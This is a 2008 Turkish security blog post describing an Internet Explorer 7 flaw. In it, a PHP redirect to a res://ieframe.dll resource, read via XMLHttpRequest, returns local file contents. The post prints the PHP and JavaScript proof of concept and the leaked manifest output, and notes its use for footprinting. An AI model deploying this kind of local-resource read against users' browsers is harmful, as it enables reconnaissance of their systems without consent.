IE 7 Header Forwards

Date Nisan 14, 2008

Internet Explorer 7 de  bir çok phishing ve benzeri saldırılara karşı filtreler geliştirilmişti.Genel olarak bakıldığında az ve orta düzey bilgiye sahip kullanıcıların ihtiyaçlarını karşılar nitelikte olan gelişmelerdi.Ancak son günler IE 8 beta sürümleri yayınlanmasının altında IE 7 ile birlikte gelen güvenlik zaafiyetlerinin patchlenmiş olması geliyor.IE 7 barındırdığı güvenlik zaafiyetlerinden biri header forwards (başlık yönlendirme)olarak adlandıracağımız resource schemelerinin sömürülerek XmlHttpRequest vasıtasıyla istediğimiz verileri elde etme imkanı buluyoruz.PHP ve JavaScript ile hazırlayacağımız örnek uygulamamız ile IE 7 için ieframe.dll dosyasından yararlanıp sistem özellikleri hakkındaki bilgileri bize yansıtıyor.

 Örnek PHP kodumuz:

<?php
header(”location: res://ieframe.dll/24/123″);
?>


Örnek Jscript kodumuz:


Bir XML nesnesi oluşturup  the_header_file.php içindeki yönlendirme işleminden alınan değerleri oluşturduğumuz XML dosyasına aktarıp sonucu bize gösteriyor.  <script>


var xml = new XMLHttpRequest();


xml.open(”GET”,”/the_header_file.php”);


xml.onreadystatechange=function (){


if (xml.readyState == 4){


alert(xml.responseText)


}


}


xml.send(null);

</script> 




XML talep işlemini gerçekleştirerek bize aşağıdaki sonucu getiriyor.


<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes” ?>


<!–  Copyright (c) Microsoft Corporation –>


<assembly xmlns=”urn:schemas-microsoft-com:asm.v1″ xmlns:asmv3=”urn:schemas-microsoft-com:asm.v3″ manifestVersion=”1.0″>


<assemblyIdentity name=”Microsoft.Windows.InetCore.ieframe”processorArchitecture=”x86″ version=”5.1.0.0″ type=”win32″ />


<description>Windows IE</description>


<dependency>


<dependentAssembly>


<assemblyIdentity type=”win32″name=”Microsoft.Windows.Common-Controls”version=”6.0.0.0″ processorArchitecture=”*”


publicKeyToken=”6595b64144ccf1df” language=”*” />


</dependentAssembly>


</dependency>


<trustInfo xmlns=”urn:schemas-microsoft-com:asm.v3″>


<security>


<requestedPrivileges>


<requestedExecutionLevel level=”asInvoker” uiAccess=”false” />


</requestedPrivileges>


</security>


</trustInfo>


<asmv3:application>


<asmv3:windowsSettings xmlns=”http://schemas.microsoft.com/SMI/2005/WindowsSettings”>


<dpiAware>true</dpiAware>


</asmv3:windowsSettings>


</asmv3:application>


</assembly>


IE 7 ‘deki bu güvenlik vasıtasıyla sistem üzerindeki farklı noktalar ile temas kurulabilir.Footprinting gibi iÅŸlemlerde temel tespit ögesi olarak kullanılabilir.

	
Category Kategori: Güvenlik	





	



   
		

	 



Sende Yorum Yaz ...
























XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> 
















	


    
	








eXTReMe Tracker